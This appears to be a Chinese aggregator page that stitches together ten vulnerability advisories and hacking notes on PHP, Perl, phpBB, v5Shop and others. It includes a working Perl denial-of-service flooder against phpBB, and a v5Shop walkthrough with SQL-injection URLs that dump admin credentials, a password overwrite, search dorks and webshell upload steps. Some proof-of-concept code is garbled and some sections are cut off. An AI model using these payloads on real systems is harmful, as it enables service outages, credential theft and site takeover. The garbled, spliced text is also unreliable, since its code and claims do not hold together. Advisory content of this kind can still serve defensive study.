PHPzendstrtod函数浮点值拒绝服务漏洞及修复(推荐10篇)由网友“鼻毛打结”投稿提供,以下是小编整理过的PHPzendstrtod函数浮点值拒绝服务漏洞及修复,欢迎阅读分享,希望对您有所帮助。
篇1:PHPzendstrtod函数浮点值拒绝服务漏洞及修复
影响版本:
PHP PHP 5.3.2
PHP PHP 5.3.1
PHP PHP 5.3
PHP PHP 5.2.15
PHP PHP 5.2.13
PHP PHP 5.2.12
PHP PHP 5.2.11
PHP PHP 5.2.10
PHP PHP 5.2.9 -2
PHP PHP 5.2.9
PHP PHP 5.2.8
PHP PHP 5.2.7
PHP PHP 5.2.6
PHP PHP 5.2.5
PHP PHP 5.2.4
PHP PHP 5.2.3
PHP PHP 5.2.2
PHP PHP 5.2.1
Ubuntu Ubuntu Linux 7.04 sparc
Ubuntu Ubuntu Linux 7.04 powerpc
Ubuntu Ubuntu Linux 7.04 i386
Ubuntu Ubuntu Linux 7.04 amd64
PHP PHP 5.1.6
Ubuntu Ubuntu Linux 6.10 sparc
Ubuntu Ubuntu Linux 6.10 powerpc
Ubuntu Ubuntu Linux 6.10 i386
Ubuntu Ubuntu Linux 6.10 amd64
PHP PHP 5.1.5
PHP PHP 5.1.4
PHP PHP 5.1.3 -RC1
PHP PHP 5.1.3
PHP PHP 5.1.2
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
PHP PHP 5.1.1
PHP PHP 5.1
PHP PHP 5.0.5
PHP PHP 5.0.4
PHP PHP 5.0.3
Trustix Secure Linux 2.2
PHP PHP 5.0.2
PHP PHP 5.0.1
PHP PHP 5.0 candidate 3
PHP PHP 5.0 candidate 2
PHP PHP 5.0 candidate 1
PHP PHP 5.0 .0
PHP PHP 5.3.3
PHP PHP 5.2.14
PHP PHP 5.2
Debian Linux 4.0 sparc
Debian Linux 4.0 s/390
Debian Linux 4.0 powerpc
Debian Linux 4.0 mipsel
Debian Linux 4.0 mips
Debian Linux 4.0 m68k
Debian Linux 4.0 ia-64
Debian Linux 4.0 ia-32
Debian Linux 4.0 hppa
Debian Linux 4.0 arm
Debian Linux 4.0 amd64
Debian Linux 4.0 alpha
Debian Linux 4.0
漏洞描述:
PHP是容易远程拒绝服务漏洞,
PHPzendstrtod函数浮点值拒绝服务漏洞及修复
,
成功的攻击将导致PHP编写的应用程序挂起,创建一个拒绝服务条件。
PHP 5.3.3是脆弱的,其他版本也可能受到影响。
<*参考
sebug.net/
*>
测试方法:
以下证明,可用的概念代码:
$b = “bbbbbbbbbbb”;
str_repeat(“THIS IS A SECRET MESSAGE, ISN'T IT?”, 1);
$var3 = mb_strcut($b, 0, 1000);
echo $var3;
?>
解决方案:
目前我们没有任何厂商提供的修补程序,请关注官方获取
篇2:Perl Perlregnumberedbufffetch 函数远程拒绝服务漏洞
影响版本:
Larry Wall Perl 5.x
漏洞描述:
Perl 是一种自由且功能强大的编程语言,它被用作 Web 编程、数据库处理、XML 处理以及系统管理等等 ― 它能够完成所有这些工作,同时仍然是处理小的日常工作的完美工具。
Perl “Perl_reg_numbered_buff_fetch()”函数在实现上存在远程拒绝服务漏洞,远程攻击者可利用此漏洞造成使用受影响perl代码的应用程序终止运行,拒绝服务合法用户,
<*参考
*>
测试方法:
#!/usr/bin/perl
my @x = (“A=B”,“AAAA=/”);
utf8::upgrade $_ for @x;
$x[1] =~ s{/s*$}{};
for (@x) {
m{^([^=]+?)s*=.+$};
}
厂商补丁:
Larry Wall
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www.perl.org/
篇3:微软发布“拒绝服务漏洞”修复补丁漏洞预警
在修补了59个IE漏洞之后,微软终于为其安全软件堵上了一个安全漏洞,据悉,该漏洞可在使用“恶意软件防护引擎”(Malware Protection Engine)进行扫描时触发。然后,攻击者可利用其发动拒绝服务(DoS)攻击,除非文件被删除并重启。
微软将该补丁设定成了“重要”级别。
尽管攻击者要实现一次成功的攻击,需要来自用户的一些交互(如下载一个附件并打开),可鉴于大多数用户的技能水平和安全意识,未打补丁的系统仍将面临极大的风险。
受该漏洞影响的软件包括Microsoft Forefront Client Security、Microsoft Forefront Endpoint Protection 、Microsoft Forefront Security for SharePoint Service Pack 3、Microsoft System Center Endpoint Protection、Microsoft Malicious Software Removal Tool,以及Windows Intune Endpoint Protection、Microsoft Security Essentials和Windows Defender(最后一个可是随着最新的微软OS一起预装的,影响面也是最广的),
虽然微软会通过“自动更新”来升级上述软件的定义库和引擎,但用户最好还是看下自己的“恶意软件防护引擎”的版本是否已经升级到了1.1.10701.0及以上。
篇4:Cisco CallManager拒绝服务漏洞
成功利用这些漏洞会导致拒绝服务攻击,造成高CPU使用率、中断服务或重启服务器,然后可能导致电话无法响应、从CCM注销电话或CCM重启,
详细描述:
Cisco CallManager(CCM)是Cisco IP电话解决方案的基于软件的呼叫处理组件。 P
一些CCM版本没有主动管理TCP连接和Windows消息,导致一些公开的发布端口受拒绝服务攻击影响:
1 CCM没有足够主动的超时到端口的TCP连接,导致足够多的开放连接会耗尽内存和CPU资源。在特定的情况下,CCM会无限期的保持TCP连接开放,直到重启CCM服务或重启服务器。
2 多个到、或7727端口的连接会充满Windows消息队列,导致CCM无法处理Windows Service Manager,在30秒超时后重启CCM,
成功利用这些漏洞会导致拒绝服务攻击,造成高CPU使用率、中断服务或重启服务器,然后可能导致电话无法响应、从CCM注销电话或CCM重启。
受影响系统:
Cisco Call Manager = 3.2
Cisco Call Manager 4.1
Cisco Call Manager 4.0
Cisco Call Manager 3.3
补丁下载:
Cisco
-----
Cisco已经为此发布了一个安全公告(cisco-sa-0118-ccmdos)以及相应补丁:
cisco-sa-20060118-ccmdos:Cisco Call Manager Denial of Service
链接:www.cisco.com/warp/public/707/cisco-sa-20060118-ccmdos.shtml
篇5:请求远程拒绝服务漏洞
/* CSS Document */
Firebird是一款提供多个ANSI SQL-92功能的关系型数据库,可运行在Linux、Windows和各种Unix平台下,
在Firebird的src/remote/server.cpp文件中,process_packet2函数负责处理从客户端发送过来的报文。这个函数有一个switch语句考虑协议中所定义的所有可能的opcode。
/-----------
src/remote/server.cpp:
...
3404 P_OP p = receive->p_operation;
3405 switch (op)
3406 {
3407 case op_connect:
...
3426 case op_compile:
...
3430 case op_attach:
...
- -----------/
在op_connect_request报文的情况下,执行流进入switch语句的以下case:
/-----------
src/remote/server.cpp:
...
3584 case op_connect_request:
3585 aux_request(port, &receive->p_req, sendL);
3586 break;
- -----------/
在调用aux_request()函数并执行break语句后,执行流到达:
/-----------
src/remote/server.cpp:
...
3652 if (port && port->port_state == state_broken) {
3653 if (!port->port_parent) {
3654 gds__log(“SERVER/process_packet: broken port, server exiting”);
3655 port->disconnect(sendL, receive);
3656 ThreadData::restoreSpecific();
3657 return false;
3658 }
3659 port->disconnect(sendL, receive);
3660 port = NULL;
3661 }
- -----------/
通过在接收到op_connect_request报文时调试fbserver.exe二进制程序可以看出满足了第一个if语句的条件,但没有满足第二个if的条件,因此执行流到达port->disconnect()调用:
/-----------
005ACE2C |> 837E 0C 03 CMP DWORD PTR DS:[ESI+C],3
;port->port_state == state_broken ?
005ACE30 |. 75 1B JNZ SHORT fbserver.005ACE4D
005ACE32 |. 837E 1C 00 CMP DWORD PTR DS:[ESI+1C],0
;port->port_parent == 0?
005ACE36 |. 75 0A JNZ SHORT fbserver.005ACE42
;this conditional jump is taken
005ACE38 |. 68 D4D65F00 PUSH fbserver.005FD6D4
; ASCII “SERVER/process_packet: broken port, server exiting”
005ACE3D |.^ E9 44FDFFFF JMP fbserver.005ACB86
005ACE42 |> 53 PUSH EBX
; /Arg2
005ACE43 |. 57 PUSH EDI
; |Arg1
005ACE44 |. 8BCE MOV ECX,ESI
; |
005ACE46 |. E8 65D7FFFF CALL
; /port->disconnect(sendL, receive)
- -----------/
根据src/remote/remote.h中的定义,port的类型为struct rem_port,
这种结构类型在src/remote/server.cpp中实现了disconnect()函数:
/-----------
src/remote/server.cpp:
1464 void rem_port::disconnect(PACKET* sendL, PACKET* receiveL)
- -----------/
在这个函数中执行以下代码以释放发送和接收的报文并关闭相关的套接字:
/-----------
src/remote/server.cpp:
[1] [2] 下一页
篇6:or=or 漏洞修复方法
hacknote.com
解决方法:搜索login.asp下的
把类似
username=request.Form(“name”)
pass=request.Form(“pass”)
修改为
username=Replace(request.Form(“name”), “'”, “''”)
pass=Replace(request.Form(“pass”), “'”, “''”)
语法是屏蔽'和''这个来达到效果.
==============================
有的程序根据具体情况不一样
篇7:Mozilla Firefox jsInitRandom函数不充分随机数漏洞及修复
影响版本:
Mozilla Firefox 4.0 Beta1
Mozilla Firefox 3.6.x
Mozilla Firefox 3.5.x漏洞描述:
CVE(CAN) ID: CVE--3399,CVE-2010-3400
Firefox是一款非常流行的开源WEB浏览器,
Firefox的JavaScript实现中的js_InitRandom函数使用了当前时间或环境相关的指针作为随机数生成器的种子,攻击者可以通过暴力猜测攻击相对容易的猜测到种子值,从而执行劫持会话等各种攻击,
<*参考
Johnathan Nightingale (johnath@johnath.com)
bugzilla.mozilla.org/show_bug.cgi?id=475585
*>
厂商补丁:
Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
bugzilla.mozilla.org/attachment.cgi?id=400900&action=diff
篇8:FreeBSD setusercontext函数绕过安全限制漏洞及修复
影响版本:
FreeBSD 8.0
FreeBSD 7.2漏洞描述:
BUGTRAQ ID: 42533
FreeBSD就是一种运行在Intel平台上、可以自由使用的开放源码Unix类系统,
在以其他用户的权限运行时lib/libutil/login_class.c文件中的setusercontext函数应用了特定的用户设置,这允许本地用户通过创建特制的~/.login_conf文件并通过OpenSSH登录更改某些受限制的资源。<*参考
Andrey Zonov (andrey.zonov@gmail.com)
secunia.com/advisories/40923/
www.freebsd.org/cgi/query-pr.cgi?pr=141840
*>
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
1. 在/etc/login.conf中添加新的登录类
test:
:cputime=1h:
:tc=default:
2. Make db
# cap_mkdb /etc/login.conf
3. 更改账号的登录类
# pw usermod $login -L test
4. 通过$login以SSH连接到这个主机并执行limits -a
$ limits -a
Resource limits (current):
cputime 3600 secs
filesize infinity kB
datasize 524288 kB
stacksize 65536 kB
coredumpsize infinity kB
memoryuse infinity kB
memorylocked infinity kB
maxprocesses 3603
openfiles 7207
sbsize infinity bytes
vmemoryuse infinity kB
pseudo-terminals infinity
swapuse infinity kB
5. 创建~/.login_conf
me:
:cputime=2h:
6. 再次连接到这个主机并执行limits -a
$ limits -a
Resource limits (current):
cputime 7200 secs
filesize infinity kB
datasize 524288 kB
stacksize 65536 kB
coredumpsize infinity kB
memoryuse infinity kB
memorylocked infinity kB
maxprocesses 3603
openfiles 7207
sbsize infinity bytes
vmemoryuse infinity kB
pseudo-terminals infinity
swapuse infinity kB
厂商补丁:
FreeBSD
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
www.freebsd.org/cgi/query-pr.cgi?pr=141840
篇9:phpBB远程拒绝服务漏洞漏洞预警
phpBB远程拒绝服务漏洞
漏洞版本:
phpBB phpBB 3.0.8
phpBB phpBB 3.0.7
phpBB phpBB 3.0.6
phpBB phpBB 3.0.5
phpBB phpBB 3.0.4
phpBB phpBB 3.0.3
phpBB phpBB 3.0.2
phpBB phpBB 3.0.1
phpBB phpBB 3.0
phpBB phpBB 2.0.21
phpBB phpBB 2.0.19
phpBB phpBB 2.0.17
phpBB phpBB 2.0.16
phpBB phpBB 2.0.15
phpBB phpBB 2.0.14
phpBB phpBB 2.0.13
phpBB phpBB 2.0.12
phpBB phpBB 2.0.11
phpBB phpBB 2.0.10
phpBB phpBB 2.0.9
phpBB phpBB 2.0.7
phpBB phpBB 2.0.6
phpBB phpBB 2.0.5
phpBB phpBB 2.0.4
phpBB phpBB 2.0.3
phpBB phpBB 2.0.2
phpBB phpBB 2.0.1
phpBB phpBB 1.4.4
phpBB phpBB 1.4.2
phpBB phpBB 1.4.1
phpBB phpBB 1.2.1
phpBB phpBB 2.0.22
phpBB phpBB 2.0.20
phpBB phpBB 2.0.18
漏洞描述:
Bugtraq ID:65481
phpBB是phpBB组开发的一套开源的使用PHP语言开发的Web论坛软件,该软件具有支持多国语言、支持多种数据库和自定义版面设计等特点。
phpBB中存在远程拒绝服务漏洞。攻击者可利用该漏洞造成受影响应用程序崩溃,拒绝服务合法用户。
<* 参考
www.securityfocus.com/bid/65481
sebug.net/appdir/phpBB
*>
测试方法:
@Sebug.net dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
###########################
# Phpbb Forum Denial of Service Vulnerability
###########################
#!/usr/bin/perl
# Iranian Exploit DataBase
# Phpbb Forum Denial of Service Vulnerability
# Version: All Version
# Vendor site : www.phpbb.com
# Code Written By Amir – iedb.team@gmail.com – o0_iedb_0o@yahoo.com
# Site : Www.IeDb.Ir – Www.IrIsT.Ir
# Fb Page :
www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538
# Greats : TaK.FaNaR – ErfanMs – Medrik – F@riD – Bl4ck M4n – 0x0ptim0us
- 0Day – Dj.TiniVini – E2MA3N
# l4tr0d3ctism – H-SK33PY – Noter – r3d_s0urc3 – Dr_Evil And All
Members In IeDb.Ir/acc
#####################################
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i–)
{
$data =
“securitytoken=guest&do=process&query=%DB%8C%D8%B3%D8%A8%D9%84%D8%B3%DB%8C%D9%84%D8%B3%DB%8C%D8%A8%D9%84%0%0%0%0%0%0%0%0%0%0&submit.x=0&submit.y=0″;
$len = length $data;
$foo = “POST “.$dir.”search.php?do=process HTTP/1.1\r\n”.
“Accept: * /*\r\n”.
“Accept-Language: en-gb\r\n”.
“Content-Type: application/x-www-form-urlencoded\r\n”.
“Accept-Encoding: gzip, deflate\r\n”.
“User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n”.
“Host: $host\r\n”.
“Content-Length: $len\r\n”.
“Connection: Keep-Alive\r\n”.
“Cache-Control: no-cache\r\n\r\n”.
“$data”;
my $port = “80″;
my $proto = getprotobyname(‘tcp’);
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,”$foo”, 0);
syswrite STDOUT, “+” ;
}
print “\n\n”;
system(‘ping $host’);
sub usage {
print “\n”;
print “################################################# \n”;
print “## Phpbb Forum Denial of Service Vulnerability\n”;
print “## Discoverd By Amir – iedb.team@gmail.com – Id : o0_iedb_0o \n”;
print “## Www.IeDb.Ir – Www.IrIsT.Ir \n”;
print “################################################# \n”;
print “## [host] [path] \n”;
print “## host.com /forum/\n”;
print “################################################# \n”;
print “\n”;
exit();
};
#####################################
# Archive Exploit = www.iedb.ir/exploits-868.html
#####################################
###########################
# Iranian Exploit DataBase = IeDb.Ir [-11-17]
###########################
安全建议:
目前厂商暂无提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www.phpbb.com/
篇10:v5Shop注入漏洞及修复
/commond.aspx?id=1869
没办法union,只能让它暴错了
暴管理员用户名:/commond.aspx?id=1869 and 1=(select top 1 [name] from web_admin)--
暴管理员密 码:/commond.aspx?id=1869 and 1=(select top 1 [pass] from web_admin)--
过滤了单引号.只能把字符串转化成16进制的了
更新管理员密码:update web_admin set
pass=0x31004200460041004500370042004500410043004600350036003200330041003200430042
004400450037004400450041003600340042003700430037004300
weblogin/System_Config_Operate.aspx
后台上传水印.可以直接上传大马.
拿webshell
切记.千万不要传ASPX的马......不然不会成功的.
你可以先传ASP的马..再传ASPX马.
马的路径为:uploadFile/Picture/木马.asp
关键字:services.aspxid=
inurl:scoreindex.aspx
默认后台地址:weblogin/Login.aspx
/weblogin/index.aspx
复制这段代码 域名+代码
cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --
更新管理员密码:update web_admin setpass=0x310042004600410045003700420045004100430046003500360032003300410032004300420044
00450037004400450041003600340042003700430037004300
weblogin/System_Config_Operate.aspx
后台上传水印.可以直接上传大马.
后台拿webshell
切记.不要传ASPX的马......不然不会成功的.
你可以先传ASP的马..再传ASPX马.
马的路径为:uploadFile/Picture/木马.asp
文章作者:黑面小窝
修复:对照过滤
★ Linux Kiss Server lks.c文件多个格式串处理漏洞
★ C语言嵌套注释
★ F2摩托艇比赛
【PHPzendstrtod函数浮点值拒绝服务漏洞及修复(推荐10篇)】相关文章:
计算机网络综合实验报告参考2022-05-26
abiword的中文显示问题!_Unix系统2022-11-07
财务招聘笔试题2022-06-30
Lua数据类型介绍2022-08-18
计算机二级c语言试题及答案2022-11-07
大众机械招聘笔试题2022-06-25
微软研究院面试题目2022-10-20
c语言学习方法2022-05-06
c语言函数知识点总结2023-04-03
书的新一代2022-08-16